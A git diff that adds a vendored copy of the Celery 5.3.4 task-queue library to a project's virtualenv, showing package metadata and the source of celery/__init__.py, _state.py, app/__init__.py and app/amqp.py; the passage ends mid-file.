+celery/worker/consumer/__pycache__/control.cpython-310.pyc,, +celery/worker/consumer/__pycache__/events.cpython-310.pyc,, +celery/worker/consumer/__pycache__/gossip.cpython-310.pyc,, +celery/worker/consumer/__pycache__/heart.cpython-310.pyc,, +celery/worker/consumer/__pycache__/mingle.cpython-310.pyc,, +celery/worker/consumer/__pycache__/tasks.cpython-310.pyc,, +celery/worker/consumer/agent.py,sha256=bThS8ZVeuybAyqNe8jmdN6RgaJhDq0llewosGrO85-c,525 +celery/worker/consumer/connection.py,sha256=a7g23wmzevkEiMjjjD8Kt4scihf_NgkpR4gcuksys9M,1026 +celery/worker/consumer/consumer.py,sha256=j88iy-6bT5aZNv2NZDjUoHegPHP3cKT4HXZLxI82H4c,28866 
+celery/worker/consumer/control.py,sha256=0NiJ9P-AHdv134mXkgRgU9hfhdJ_P7HKb7z9A4Xqa2Q,946 +celery/worker/consumer/events.py,sha256=FgDwbV0Jbj9aWPbV3KAUtsXZq4JvZEfrWfnrYgvkMgo,2054 +celery/worker/consumer/gossip.py,sha256=g-WJL2rr_q9aM_SaTUrQlPj2ONf8vHs2LvmyRQtDMEU,6833 +celery/worker/consumer/heart.py,sha256=IenkkliKk6sAk2a1NfYyh-doNDlmFWGRiaJd5e8ALpI,930 +celery/worker/consumer/mingle.py,sha256=UG8K6sXF1KUJXNiJ4eMHUMIg4_7K1tDWqYRNfd9Nz9k,2519 +celery/worker/consumer/tasks.py,sha256=PwNqAZHJGQakiymFa4q6wbpmDCp3UtSN_7fd5jgATRk,1960 +celery/worker/control.py,sha256=30azpxShUHNuKevEsJG47zQ11ldrEaaq5yatUvQT23U,19884 +celery/worker/heartbeat.py,sha256=sTV_d0RB9M6zsXIvLZ7VU6teUfX3IK1ITynDpxMS298,2107 +celery/worker/loops.py,sha256=W9ayCwYXOA0aCxPPotXc49uA_n7CnMsDRPJVUNb8bZM,4433 +celery/worker/pidbox.py,sha256=LcQsKDkd8Z93nQxk0SOLulB8GLEfIjPkN-J0pGk7dfM,3630 +celery/worker/request.py,sha256=MF7RsVmm4JrybOhnQZguxDcIpEuefdOTMxADDoJvg70,27229 +celery/worker/state.py,sha256=_nQgvGeoahKz_TJCx7Tr20kKrNtDgaBA78eA17hA-8s,8583 +celery/worker/strategy.py,sha256=MSznfZXkqD6WZRSaanIRZvg-f41DSAc2WgTVUIljh0c,7324 +celery/worker/worker.py,sha256=rNopjWdAzb9Ksszjw9WozvCA5nkDQnbp0n11MeLAitc,14460 diff --git a/env/Lib/site-packages/celery-5.3.4.dist-info/REQUESTED b/env/Lib/site-packages/celery-5.3.4.dist-info/REQUESTED new file mode 100644 index 00000000..e69de29b diff --git a/env/Lib/site-packages/celery-5.3.4.dist-info/WHEEL b/env/Lib/site-packages/celery-5.3.4.dist-info/WHEEL new file mode 100644 index 00000000..1f37c02f --- /dev/null +++ b/env/Lib/site-packages/celery-5.3.4.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.40.0) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/env/Lib/site-packages/celery-5.3.4.dist-info/entry_points.txt b/env/Lib/site-packages/celery-5.3.4.dist-info/entry_points.txt new file mode 100644 index 00000000..a5801496 --- /dev/null +++ b/env/Lib/site-packages/celery-5.3.4.dist-info/entry_points.txt @@ -0,0 +1,2 @@ +[console_scripts] +celery = celery.__main__:main diff --git a/env/Lib/site-packages/celery-5.3.4.dist-info/top_level.txt b/env/Lib/site-packages/celery-5.3.4.dist-info/top_level.txt new file mode 100644 index 00000000..74f9e8fe --- /dev/null +++ b/env/Lib/site-packages/celery-5.3.4.dist-info/top_level.txt @@ -0,0 +1 @@ +celery diff --git a/env/Lib/site-packages/celery/__init__.py b/env/Lib/site-packages/celery/__init__.py new file mode 100644 index 00000000..e11a18c7 --- /dev/null +++ b/env/Lib/site-packages/celery/__init__.py @@ -0,0 +1,172 @@ +"""Distributed Task Queue.""" +# :copyright: (c) 2017-2026 Asif Saif Uddin, celery core and individual +# contributors, All rights reserved. +# :copyright: (c) 2015-2016 Ask Solem. All rights reserved. +# :copyright: (c) 2012-2014 GoPivotal, Inc., All rights reserved. +# :copyright: (c) 2009 - 2012 Ask Solem and individual contributors, +# All rights reserved. +# :license: BSD (3 Clause), see LICENSE for more details. + +import os +import re +import sys +from collections import namedtuple + +# Lazy loading +from . 
import local + +SERIES = 'emerald-rush' + +__version__ = '5.3.4' +__author__ = 'Ask Solem' +__contact__ = 'auvipy@gmail.com' +__homepage__ = 'https://docs.celeryq.dev/' +__docformat__ = 'restructuredtext' +__keywords__ = 'task job queue distributed messaging actor' + +# -eof meta- + +__all__ = ( + 'Celery', 'bugreport', 'shared_task', 'Task', + 'current_app', 'current_task', 'maybe_signature', + 'chain', 'chord', 'chunks', 'group', 'signature', + 'xmap', 'xstarmap', 'uuid', +) + +VERSION_BANNER = f'{__version__} ({SERIES})' + +version_info_t = namedtuple('version_info_t', ( + 'major', 'minor', 'micro', 'releaselevel', 'serial', +)) + +# bumpversion can only search for {current_version} +# so we have to parse the version here. +_temp = re.match( + r'(\d+)\.(\d+).(\d+)(.+)?', __version__).groups() +VERSION = version_info = version_info_t( + int(_temp[0]), int(_temp[1]), int(_temp[2]), _temp[3] or '', '') +del _temp +del re + +if os.environ.get('C_IMPDEBUG'): # pragma: no cover + import builtins + + def debug_import(name, locals=None, globals=None, + fromlist=None, level=-1, real_import=builtins.__import__): + glob = globals or getattr(sys, 'emarfteg_'[::-1])(1).f_globals + importer_name = glob and glob.get('__name__') or 'unknown' + print(f'-- {importer_name} imports {name}') + return real_import(name, locals, globals, fromlist, level) + builtins.__import__ = debug_import + +# This is never executed, but tricks static analyzers (PyDev, PyCharm, +# pylint, etc.) into knowing the types of these symbols, and what +# they contain. +STATICA_HACK = True +globals()['kcah_acitats'[::-1].upper()] = False +if STATICA_HACK: # pragma: no cover + from celery._state import current_app, current_task + from celery.app import shared_task + from celery.app.base import Celery + from celery.app.task import Task + from celery.app.utils import bugreport + from celery.canvas import (chain, chord, chunks, group, maybe_signature, signature, subtask, xmap, # noqa + xstarmap) + from celery.utils import uuid + +# Eventlet/gevent patching must happen before importing +# anything else, so these tools must be at top-level. + + +def _find_option_with_arg(argv, short_opts=None, long_opts=None): + """Search argv for options specifying short and longopt alternatives. + + Returns: + str: value for option found + Raises: + KeyError: if option not found. + """ + for i, arg in enumerate(argv): + if arg.startswith('-'): + if long_opts and arg.startswith('--'): + name, sep, val = arg.partition('=') + if name in long_opts: + return val if sep else argv[i + 1] + if short_opts and arg in short_opts: + return argv[i + 1] + raise KeyError('|'.join(short_opts or [] + long_opts or [])) + + +def _patch_eventlet(): + import eventlet.debug + + eventlet.monkey_patch() + blockdetect = float(os.environ.get('EVENTLET_NOBLOCK', 0)) + if blockdetect: + eventlet.debug.hub_blocking_detection(blockdetect, blockdetect) + + +def _patch_gevent(): + import gevent.monkey + import gevent.signal + + gevent.monkey.patch_all() + + +def maybe_patch_concurrency(argv=None, short_opts=None, + long_opts=None, patches=None): + """Apply eventlet/gevent monkeypatches. + + With short and long opt alternatives that specify the command line + option to set the pool, this makes sure that anything that needs + to be patched is completed as early as possible. + (e.g., eventlet/gevent monkey patches). 
+ """ + argv = argv if argv else sys.argv + short_opts = short_opts if short_opts else ['-P'] + long_opts = long_opts if long_opts else ['--pool'] + patches = patches if patches else {'eventlet': _patch_eventlet, + 'gevent': _patch_gevent} + try: + pool = _find_option_with_arg(argv, short_opts, long_opts) + except KeyError: + pass + else: + try: + patcher = patches[pool] + except KeyError: + pass + else: + patcher() + + # set up eventlet/gevent environments ASAP + from celery import concurrency + if pool in concurrency.get_available_pool_names(): + concurrency.get_implementation(pool) + + +# this just creates a new module, that imports stuff on first attribute +# access. This makes the library faster to use. +old_module, new_module = local.recreate_module( # pragma: no cover + __name__, + by_module={ + 'celery.app': ['Celery', 'bugreport', 'shared_task'], + 'celery.app.task': ['Task'], + 'celery._state': ['current_app', 'current_task'], + 'celery.canvas': [ + 'Signature', 'chain', 'chord', 'chunks', 'group', + 'signature', 'maybe_signature', 'subtask', + 'xmap', 'xstarmap', + ], + 'celery.utils': ['uuid'], + }, + __package__='celery', __file__=__file__, + __path__=__path__, __doc__=__doc__, __version__=__version__, + __author__=__author__, __contact__=__contact__, + __homepage__=__homepage__, __docformat__=__docformat__, local=local, + VERSION=VERSION, SERIES=SERIES, VERSION_BANNER=VERSION_BANNER, + version_info_t=version_info_t, + version_info=version_info, + maybe_patch_concurrency=maybe_patch_concurrency, + _find_option_with_arg=_find_option_with_arg, +) diff --git a/env/Lib/site-packages/celery/__main__.py b/env/Lib/site-packages/celery/__main__.py new file mode 100644 index 00000000..8c48d707 --- /dev/null +++ b/env/Lib/site-packages/celery/__main__.py @@ -0,0 +1,19 @@ +"""Entry-point for the :program:`celery` umbrella command.""" + +import sys + +from . import maybe_patch_concurrency + +__all__ = ('main',) + + +def main() -> None: + """Entrypoint to the ``celery`` umbrella command.""" + if 'multi' not in sys.argv: + maybe_patch_concurrency() + from celery.bin.celery import main as _main + sys.exit(_main()) + + +if __name__ == '__main__': # pragma: no cover + main() diff --git a/env/Lib/site-packages/celery/_state.py b/env/Lib/site-packages/celery/_state.py new file mode 100644 index 00000000..5d3ed5fc --- /dev/null +++ b/env/Lib/site-packages/celery/_state.py @@ -0,0 +1,197 @@ +"""Internal state. + +This is an internal module containing thread state +like the ``current_app``, and ``current_task``. + +This module shouldn't be used directly. +""" + +import os +import sys +import threading +import weakref + +from celery.local import Proxy +from celery.utils.threads import LocalStack + +__all__ = ( + 'set_default_app', 'get_current_app', 'get_current_task', + 'get_current_worker_task', 'current_app', 'current_task', + 'connect_on_app_finalize', +) + +#: Global default app used when no current app. +default_app = None + +#: Function returning the app provided or the default app if none. +#: +#: The environment variable :envvar:`CELERY_TRACE_APP` is used to +#: trace app leaks. When enabled an exception is raised if there +#: is no active app. +app_or_default = None + +#: List of all app instances (weakrefs), mustn't be used directly. +_apps = weakref.WeakSet() + +#: Global set of functions to call whenever a new app is finalized. +#: Shared tasks, and built-in tasks are created by adding callbacks here. 
+_on_app_finalizers = set() + +_task_join_will_block = False + + +def connect_on_app_finalize(callback): + """Connect callback to be called when any app is finalized.""" + _on_app_finalizers.add(callback) + return callback + + +def _announce_app_finalized(app): + callbacks = set(_on_app_finalizers) + for callback in callbacks: + callback(app) + + +def _set_task_join_will_block(blocks): + global _task_join_will_block + _task_join_will_block = blocks + + +def task_join_will_block(): + return _task_join_will_block + + +class _TLS(threading.local): + #: Apps with the :attr:`~celery.app.base.BaseApp.set_as_current` attribute + #: sets this, so it will always contain the last instantiated app, + #: and is the default app returned by :func:`app_or_default`. + current_app = None + + +_tls = _TLS() + +_task_stack = LocalStack() + + +#: Function used to push a task to the thread local stack +#: keeping track of the currently executing task. +#: You must remember to pop the task after. +push_current_task = _task_stack.push + +#: Function used to pop a task from the thread local stack +#: keeping track of the currently executing task. +pop_current_task = _task_stack.pop + + +def set_default_app(app): + """Set default app.""" + global default_app + default_app = app + + +def _get_current_app(): + if default_app is None: + #: creates the global fallback app instance. + from celery.app.base import Celery + set_default_app(Celery( + 'default', fixups=[], set_as_current=False, + loader=os.environ.get('CELERY_LOADER') or 'default', + )) + return _tls.current_app or default_app + + +def _set_current_app(app): + _tls.current_app = app + + +if os.environ.get('C_STRICT_APP'): # pragma: no cover + def get_current_app(): + """Return the current app.""" + raise RuntimeError('USES CURRENT APP') +elif os.environ.get('C_WARN_APP'): # pragma: no cover + def get_current_app(): + import traceback + print('-- USES CURRENT_APP', file=sys.stderr) # + + traceback.print_stack(file=sys.stderr) + return _get_current_app() +else: + get_current_app = _get_current_app + + +def get_current_task(): + """Currently executing task.""" + return _task_stack.top + + +def get_current_worker_task(): + """Currently executing task, that was applied by the worker. + + This is used to differentiate between the actual task + executed by the worker and any task that was called within + a task (using ``task.__call__`` or ``task.apply``) + """ + for task in reversed(_task_stack.stack): + if not task.request.called_directly: + return task + + +#: Proxy to current app. +current_app = Proxy(get_current_app) + +#: Proxy to current task. 
+current_task = Proxy(get_current_task) + + +def _register_app(app): + _apps.add(app) + + +def _deregister_app(app): + _apps.discard(app) + + +def _get_active_apps(): + return _apps + + +def _app_or_default(app=None): + if app is None: + return get_current_app() + return app + + +def _app_or_default_trace(app=None): # pragma: no cover + from traceback import print_stack + try: + from billiard.process import current_process + except ImportError: + current_process = None + if app is None: + if getattr(_tls, 'current_app', None): + print('-- RETURNING TO CURRENT APP --') # + + print_stack() + return _tls.current_app + if not current_process or current_process()._name == 'MainProcess': + raise Exception('DEFAULT APP') + print('-- RETURNING TO DEFAULT APP --') # + + print_stack() + return default_app + return app + + +def enable_trace(): + """Enable tracing of app instances.""" + global app_or_default + app_or_default = _app_or_default_trace + + +def disable_trace(): + """Disable tracing of app instances.""" + global app_or_default + app_or_default = _app_or_default + + +if os.environ.get('CELERY_TRACE_APP'): # pragma: no cover + enable_trace() +else: + disable_trace() diff --git a/env/Lib/site-packages/celery/app/__init__.py b/env/Lib/site-packages/celery/app/__init__.py new file mode 100644 index 00000000..4a946d93 --- /dev/null +++ b/env/Lib/site-packages/celery/app/__init__.py @@ -0,0 +1,76 @@ +"""Celery Application.""" +from celery import _state +from celery._state import app_or_default, disable_trace, enable_trace, pop_current_task, push_current_task +from celery.local import Proxy + +from .base import Celery +from .utils import AppPickler + +__all__ = ( + 'Celery', 'AppPickler', 'app_or_default', 'default_app', + 'bugreport', 'enable_trace', 'disable_trace', 'shared_task', + 'push_current_task', 'pop_current_task', +) + +#: Proxy always returning the app set as default. +default_app = Proxy(lambda: _state.default_app) + + +def bugreport(app=None): + """Return information useful in bug reports.""" + return (app or _state.get_current_app()).bugreport() + + +def shared_task(*args, **kwargs): + """Create shared task (decorator). + + This can be used by library authors to create tasks that'll work + for any app environment. + + Returns: + ~celery.local.Proxy: A proxy that always takes the task from the + current apps task registry. + + Example: + + >>> from celery import Celery, shared_task + >>> @shared_task + ... def add(x, y): + ... return x + y + ... + >>> app1 = Celery(broker='amqp://') + >>> add.app is app1 + True + >>> app2 = Celery(broker='redis://') + >>> add.app is app2 + True + """ + def create_shared_task(**options): + + def __inner(fun): + name = options.get('name') + # Set as shared task so that unfinalized apps, + # and future apps will register a copy of this task. + _state.connect_on_app_finalize( + lambda app: app._task_from_fun(fun, **options) + ) + + # Force all finalized apps to take this task as well. + for app in _state._get_active_apps(): + if app.finalized: + with app._finalize_mutex: + app._task_from_fun(fun, **options) + + # Return a proxy that always gets the task from the current + # apps task registry. 
+ def task_by_cons(): + app = _state.get_current_app() + return app.tasks[ + name or app.gen_task_name(fun.__name__, fun.__module__) + ] + return Proxy(task_by_cons) + return __inner + + if len(args) == 1 and callable(args[0]): + return create_shared_task(**kwargs)(args[0]) + return create_shared_task(*args, **kwargs) diff --git a/env/Lib/site-packages/celery/app/amqp.py b/env/Lib/site-packages/celery/app/amqp.py new file mode 100644 index 00000000..9e52af4a --- /dev/null +++ b/env/Lib/site-packages/celery/app/amqp.py @@ -0,0 +1,614 @@ +"""Sending/Receiving Messages (Kombu integration).""" +import numbers +from collections import namedtuple +from collections.abc import Mapping +from datetime import timedelta +from weakref import WeakValueDictionary + +from kombu import Connection, Consumer, Exchange, Producer, Queue, pools +from kombu.common import Broadcast +from kombu.utils.functional import maybe_list +from kombu.utils.objects import cached_property + +from celery import signals +from celery.utils.nodenames import anon_nodename +from celery.utils.saferepr import saferepr +from celery.utils.text import indent as textindent +from celery.utils.time import maybe_make_aware + +from . import routes as _routes + +__all__ = ('AMQP', 'Queues', 'task_message') + +#: earliest date supported by time.mktime. +INT_MIN = -2147483648 + +#: Human readable queue declaration. +QUEUE_FORMAT = """ +.> {0.name:<16} exchange={0.exchange.name}({0.exchange.type}) \ +key={0.routing_key} +""" + +task_message = namedtuple('task_message', + ('headers', 'properties', 'body', 'sent_event')) + + +def utf8dict(d, encoding='utf-8'): + return {k.decode(encoding) if isinstance(k, bytes) else k: v + for k, v in d.items()} + + +class Queues(dict): + """Queue name⇒ declaration mapping. + + Arguments: + queues (Iterable): Initial list/tuple or dict of queues. + create_missing (bool): By default any unknown queues will be + added automatically, but if this flag is disabled the occurrence + of unknown queues in `wanted` will raise :exc:`KeyError`. + max_priority (int): Default x-max-priority for queues with none set. + """ + + #: If set, this is a subset of queues to consume from. + #: The rest of the queues are then used for routing only. + _consume_from = None + + def __init__(self, queues=None, default_exchange=None, + create_missing=True, autoexchange=None, + max_priority=None, default_routing_key=None): + super().__init__() + self.aliases = WeakValueDictionary() + self.default_exchange = default_exchange + self.default_routing_key = default_routing_key + self.create_missing = create_missing + self.autoexchange = Exchange if autoexchange is None else autoexchange + self.max_priority = max_priority + if queues is not None and not isinstance(queues, Mapping): + queues = {q.name: q for q in queues} + queues = queues or {} + for name, q in queues.items(): + self.add(q) if isinstance(q, Queue) else self.add_compat(name, **q) + + def __getitem__(self, name): + try: + return self.aliases[name] + except KeyError: + return super().__getitem__(name) + + def __setitem__(self, name, queue): + if self.default_exchange and not queue.exchange: + queue.exchange = self.default_exchange + super().__setitem__(name, queue) + if queue.alias: + self.aliases[queue.alias] = queue + + def __missing__(self, name): + if self.create_missing: + return self.add(self.new_missing(name)) + raise KeyError(name) + + def add(self, queue, **kwargs): + """Add new queue. 
+ + The first argument can either be a :class:`kombu.Queue` instance, + or the name of a queue. If the former the rest of the keyword + arguments are ignored, and options are simply taken from the queue + instance. + + Arguments: + queue (kombu.Queue, str): Queue to add. + exchange (kombu.Exchange, str): + if queue is str, specifies exchange name. + routing_key (str): if queue is str, specifies binding key. + exchange_type (str): if queue is str, specifies type of exchange. + **options (Any): Additional declaration options used when + queue is a str. + """ + if not isinstance(queue, Queue): + return self.add_compat(queue, **kwargs) + return self._add(queue) + + def add_compat(self, name, **options): + # docs used to use binding_key as routing key + options.setdefault('routing_key', options.get('binding_key')) + if options['routing_key'] is None: + options['routing_key'] = name + return self._add(Queue.from_dict(name, **options)) + + def _add(self, queue): + if queue.exchange is None or queue.exchange.name == '': + queue.exchange = self.default_exchange + if not queue.routing_key: + queue.routing_key = self.default_routing_key + if self.max_priority is not None: + if queue.queue_arguments is None: + queue.queue_arguments = {} + self._set_max_priority(queue.queue_arguments) + self[queue.name] = queue + return queue + + def _set_max_priority(self, args): + if 'x-max-priority' not in args and self.max_priority is not None: + return args.update({'x-max-priority': self.max_priority}) + + def format(self, indent=0, indent_first=True): + """Format routing table into string for log dumps.""" + active = self.consume_from + if not active: + return '' + info = [QUEUE_FORMAT.strip().format(q) + for _, q in sorted(active.items())] + if indent_first: + return textindent('\n'.join(info), indent) + return info[0] + '\n' + textindent('\n'.join(info[1:]), indent) + + def select_add(self, queue, **kwargs): + """Add new task queue that'll be consumed from. + + The queue will be active even when a subset has been selected + using the :option:`celery worker -Q` option. + """ + q = self.add(queue, **kwargs) + if self._consume_from is not None: + self._consume_from[q.name] = q + return q + + def select(self, include): + """Select a subset of currently defined queues to consume from. + + Arguments: + include (Sequence[str], str): Names of queues to consume from. + """ + if include: + self._consume_from = { + name: self[name] for name in maybe_list(include) + } + + def deselect(self, exclude): + """Deselect queues so that they won't be consumed from. + + Arguments: + exclude (Sequence[str], str): Names of queues to avoid + consuming from. + """ + if exclude: + exclude = maybe_list(exclude) + if self._consume_from is None: + # using all queues + return self.select(k for k in self if k not in exclude) + # using selection + for queue in exclude: + self._consume_from.pop(queue, None) + + def new_missing(self, name): + return Queue(name, self.autoexchange(name), name) + + @property + def consume_from(self): + if self._consume_from is not None: + return self._consume_from + return self + + +class AMQP: + """App AMQP API: app.amqp.""" + + Connection = Connection + Consumer = Consumer + Producer = Producer + + #: compat alias to Connection + BrokerConnection = Connection + + queues_cls = Queues + + #: Cached and prepared routing table. + _rtable = None + + #: Underlying producer pool instance automatically + #: set by the :attr:`producer_pool`. 
+ _producer_pool = None + + # Exchange class/function used when defining automatic queues. + # For example, you can use ``autoexchange = lambda n: None`` to use the + # AMQP default exchange: a shortcut to bypass routing + # and instead send directly to the queue named in the routing key. + autoexchange = None + + #: Max size of positional argument representation used for + #: logging purposes. + argsrepr_maxsize = 1024 + + #: Max size of keyword argument representation used for logging purposes. + kwargsrepr_maxsize = 1024 + + def __init__(self, app): + self.app = app + self.task_protocols = { + 1: self.as_task_v1, + 2: self.as_task_v2, + } + self.app._conf.bind_to(self._handle_conf_update) + + @cached_property + def create_task_message(self): + return self.task_protocols[self.app.conf.task_protocol] + + @cached_property + def send_task_message(self): + return self._create_task_sender() + + def Queues(self, queues, create_missing=None, + autoexchange=None, max_priority=None): + # Create new :class:`Queues` instance, using queue defaults + # from the current configuration. + conf = self.app.conf + default_routing_key = conf.task_default_routing_key + if create_missing is None: + create_missing = conf.task_create_missing_queues + if max_priority is None: + max_priority = conf.task_queue_max_priority + if not queues and conf.task_default_queue: + queues = (Queue(conf.task_default_queue, + exchange=self.default_exchange, + routing_key=default_routing_key),) + autoexchange = (self.autoexchange if autoexchange is None + else autoexchange) + return self.queues_cls( + queues, self.default_exchange, create_missing, + autoexchange, max_priority, default_routing_key, + ) + + def Router(self, queues=None, create_missing=None): + """Return the current task router.""" + return _routes.Router(self.routes, queues or self.queues, + self.app.either('task_create_missing_queues', + create_missing), app=self.app) + + def flush_routes(self): + self._rtable = _routes.prepare(self.app.conf.task_routes) + + def TaskConsumer(self, channel, queues=None, accept=None, **kw): + if accept is None: + accept = self.app.conf.accept_content + return self.Consumer( + channel, accept=accept, + queues=queues or list(self.queues.consume_from.values()), + **kw + ) + + def as_task_v2(self, task_id, name, args=None, kwargs=None, + countdown=None, eta=None, group_id=None, group_index=None, + expires=None, retries=0, chord=None, + callbacks=None, errbacks=None, reply_to=None, + time_limit=None, soft_time_limit=None, + create_sent_event=False, root_id=None, parent_id=None, + shadow=None, chain=None, now=None, timezone=None, + origin=None, ignore_result=False, argsrepr=None, kwargsrepr=None, stamped_headers=None, + **options): + + args = args or () + kwargs = kwargs or {} + if not isinstance(args, (list, tuple)): + raise TypeError('task args must be a list or tuple') + if not isinstance(kwargs, Mapping): + raise TypeError('task keyword arguments must be a mapping') + if countdown: # convert countdown to ETA + self._verify_seconds(countdown, 'countdown') + now = now or self.app.now() + timezone = timezone or self.app.timezone + eta = maybe_make_aware( + now + timedelta(seconds=countdown), tz=timezone, + ) + if isinstance(expires, numbers.Real): + self._verify_seconds(expires, 'expires') + now = now or self.app.now() + timezone = timezone or self.app.timezone + expires = maybe_make_aware( + now + timedelta(seconds=expires), tz=timezone, + ) + if not isinstance(eta, str): + eta = eta and eta.isoformat() + # If we retry a task `expires` 
will already be ISO8601-formatted. + if not isinstance(expires, str): + expires = expires and expires.isoformat() + + if argsrepr is None: + argsrepr = saferepr(args, self.argsrepr_maxsize) + if kwargsrepr is None: + kwargsrepr = saferepr(kwargs, self.kwargsrepr_maxsize) + + if not root_id: # empty root_id defaults to task_id + root_id = task_id + + stamps = {header: options[header] for header in stamped_headers or []} + headers = { + 'lang': 'py', + 'task': name, + 'id': task_id, + 'shadow': shadow, + 'eta': eta, + 'expires': expires, + 'group': group_id, + 'group_index': group_index, + 'retries': retries, + 'timelimit': [time_limit, soft_time_limit], + 'root_id': root_id, + 'parent_id': parent_id, + 'argsrepr': argsrepr, + 'kwargsrepr': kwargsrepr, + 'origin': origin or anon_nodename(), + 'ignore_result': ignore_result, + 'stamped_headers': stamped_headers, + 'stamps': stamps, + } + + return task_message( + headers=headers, + properties={ + 'correlation_id': task_id, + 'reply_to': reply_to or '', + }, + body=( + args, kwargs, { + 'callbacks': callbacks, + 'errbacks': errbacks, + 'chain': chain, + 'chord': chord, + }, + ), + sent_event={ + 'uuid': task_id, + 'root_id': root_id, + 'parent_id': parent_id, + 'name': name, + 'args': argsrepr, + 'kwargs': kwargsrepr, + 'retries': retries, + 'eta': eta, + 'expires': expires, + } if create_sent_event else None, + ) + + def as_task_v1(self, task_id, name, args=None, kwargs=None, + countdown=None, eta=None, group_id=None, group_index=None, + expires=None, retries=0, + chord=None, callbacks=None, errbacks=None, reply_to=None, + time_limit=None, soft_time_limit=None, + create_sent_event=False, root_id=None, parent_id=None, + shadow=None, now=None, timezone=None, + **compat_kwargs): + args = args or () + kwargs = kwargs or {} + utc = self.utc + if not isinstance(args, (list, tuple)): + raise TypeError('task args must be a list or tuple') + if not isinstance(kwargs, Mapping): + raise TypeError('task keyword arguments must be a mapping') + if countdown: # convert countdown to ETA + self._verify_seconds(countdown, 'countdown') + now = now or self.app.now() + eta = now + timedelta(seconds=countdown) + if isinstance(expires, numbers.Real): + self._verify_seconds(expires, 'expires') + now = now or self.app.now() + expires = now + timedelta(seconds=expires) + eta = eta and eta.isoformat() + expires = expires and expires.isoformat() + + return task_message( + headers={}, + properties={ + 'correlation_id': task_id, + 'reply_to': reply_to or '', + }, + body={ + 'task': name, + 'id': task_id, + 'args': args, + 'kwargs': kwargs, + 'group': group_id, + 'group_index': group_index, + 'retries': retries, + 'eta': eta, + 'expires': expires, + 'utc': utc, + 'callbacks': callbacks, + 'errbacks': errbacks, + 'timelimit': (time_limit, soft_time_limit), + 'taskset': group_id, + 'chord': chord, + }, + sent_event={ + 'uuid': task_id, + 'name': name, + 'args': saferepr(args), + 'kwargs': saferepr(kwargs), + 'retries': retries, + 'eta': eta, + 'expires': expires, + } if create_sent_event else None, + ) + + def _verify_seconds(self, s, what): + if s < INT_MIN: + raise ValueError(f'{what} is out of range: {s!r}') + return s + + def _create_task_sender(self): + default_retry = self.app.conf.task_publish_retry + default_policy = self.app.conf.task_publish_retry_policy + default_delivery_mode = self.app.conf.task_default_delivery_mode + default_queue = self.default_queue + queues = self.queues + send_before_publish = signals.before_task_publish.send + before_receivers = 
signals.before_task_publish.receivers + send_after_publish = signals.after_task_publish.send + after_receivers = signals.after_task_publish.receivers + + send_task_sent = signals.task_sent.send # XXX compat + sent_receivers = signals.task_sent.receivers + + default_evd = self._event_dispatcher + default_exchange = self.default_exchange + + default_rkey = self.app.conf.task_default_routing_key + default_serializer = self.app.conf.task_serializer + default_compressor = self.app.conf.task_compression + + def send_task_message(producer, name, message, + exchange=None, routing_key=None, queue=None, + event_dispatcher=None, + retry=None, retry_policy=None, + serializer=None, delivery_mode=None, + compression=None, declare=None, + headers=None, exchange_type=None, **kwargs): + retry = default_retry if retry is None else retry + headers2, properties, body, sent_event = message + if headers: + headers2.update(headers) + if kwargs: + properties.update(kwargs) + + qname = queue + if queue is None and exchange is None: + queue = default_queue + if queue is not None: + if isinstance(queue, str): + qname, queue = queue, queues[queue] + else: + qname = queue.name + + if delivery_mode is None: + try: + delivery_mode = queue.exchange.delivery_mode + except AttributeError: + pass + delivery_mode = delivery_mode or default_delivery_mode + + if exchange_type is None: + try: + exchange_type = queue.exchange.type + except AttributeError: + exchange_type = 'direct' + + # convert to anon-exchange, when exchange not set and direct ex. + if (not exchange or not routing_key) and exchange_type == 'direct': + exchange, routing_key = '', qname + elif exchange is None: + # not topic exchange, and exchange not undefined + exchange = queue.exchange.name or default_exchange + routing_key = routing_key or queue.routing_key or default_rkey + if declare is None and queue and not isinstance(queue, Broadcast): + declare = [queue] + + # merge default and custom policy + retry = default_retry if retry is None else retry + _rp = (dict(default_policy, **retry_policy) if retry_policy + else default_policy) + + if before_receivers: + send_before_publish( + sender=name, body=body, + exchange=exchange, routing_key=routing_key, + declare=declare, headers=headers2, + properties=properties, retry_policy=retry_policy, + ) + ret = producer.publish( + body, + exchange=exchange, + routing_key=routing_key, + serializer=serializer or default_serializer, + compression=compression or default_compressor, + retry=retry, retry_policy=_rp, + delivery_mode=delivery_mode, declare=declare, + headers=headers2, + **properties + ) + if after_receivers: + send_after_publish(sender=name, body=body, headers=headers2, + exchange=exchange, routing_key=routing_key) + if sent_receivers: # XXX deprecated + if isinstance(body, tuple): # protocol version 2 + send_task_sent( + sender=name, task_id=headers2['id'], task=name, + args=body[0], kwargs=body[1], + eta=headers2['eta'], taskset=headers2['group'], + ) + else: # protocol version 1 + send_task_sent( + sender=name, task_id=body['id'], task=name, + args=body['args'], kwargs=body['kwargs'], + eta=body['eta'], taskset=body['taskset'], + ) + if sent_event: + evd = event_dispatcher or default_evd + exname = exchange + if isinstance(exname, Exchange): + exname = exname.name + sent_event.update({ + 'queue': qname, + 'exchange': exname, + 'routing_key': routing_key, + }) + evd.publish('task-sent', sent_event, + producer, retry=retry, retry_policy=retry_policy) + return ret + return send_task_message + + @cached_property 
+ def default_queue(self): + return self.queues[self.app.conf.task_default_queue] + + @cached_property + def queues(self): + """Queue name⇒ declaration mapping.""" + return self.Queues(self.app.conf.task_queues) + + @queues.setter + def queues(self, queues): + return self.Queues(queues) + + @property + def routes(self): + if self._rtable is None: + self.flush_routes() + return self._rtable + + @cached_property + def router(self): + return self.Router() + + @router.setter + def router(self, value): + return value + + @property + def producer_pool(self): + if self._producer_pool is None: + self._producer_pool = pools.producers[ + self.app.connection_for_write()] + self._producer_pool.limit = self.app.pool.limit + return self._producer_pool + publisher_pool = producer_pool # compat alias + + @cached_property + def default_exchange(self): + return Exchange(self.app.conf.task_default_exchange, + self.app.conf.task_default_exchange_type) + + @cached_property + def utc(self): + return self.app.conf.enable_utc + + @cached_property + def _event_dispatcher(self): + # We call Dispatcher.publish with a custom producer + # so don't need the dispatcher to be enabled. + return self.app.events.Dispatcher(enabled=False) + + def _handle_conf_update(self, *args, **kwargs): + if ('task_routes' in kwargs or 'task_routes' in args): + self.flush_routes() + self.router = self.Router() + return diff --git a/env/Lib/site-packages/celery/app/annotations.py b/env/Lib/site-packages/celery/app/annotations.py new file mode 100644 index 00000000..1c0631f7 --- /dev/null +++ b/env/Lib/site-packages/celery/app/annotations.py @@ -0,0 +1,52 @@ +"""Task Annotations. + +Annotations is a nice term for 